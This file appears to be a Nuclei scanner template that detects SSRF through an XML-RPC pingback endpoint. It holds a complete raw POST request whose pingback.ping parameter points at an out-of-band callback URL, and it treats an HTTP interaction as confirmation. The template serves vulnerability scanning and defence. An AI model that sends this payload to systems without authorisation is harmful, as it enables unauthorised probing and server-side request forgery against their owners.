nuclei-templates/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml

id: xmlrpc-pingback-ssrf

info:
  name: XMLRPC Pingback SSRF
  author: geeknik
  severity: high
  description: XMLRPC Pingback leads to SSRF.
  reference:
    - https://hackerone.com/reports/406387
  metadata:
    max-request: 1
  tags: xmlrpc,hackerone,ssrf,generic

http:
  - raw:
      - |
        POST /xmlrpc/pingback HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
        <methodName>pingback.ping</methodName>
        <params>
        <param>
        <value>http://{{interactsh-url}}</value>
        </param>
        </params>
        </methodCall>

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4b0a00483046022100b9c0df7388577f0b020d925d4faf1d98344d0fed6488b6d1500c5e703b0f54a0022100ce92f1150040cc336adbdbe2e31a4363e1973409b27ec81c125c172c155d2886:922c64590222798bb761d5b6d8e72950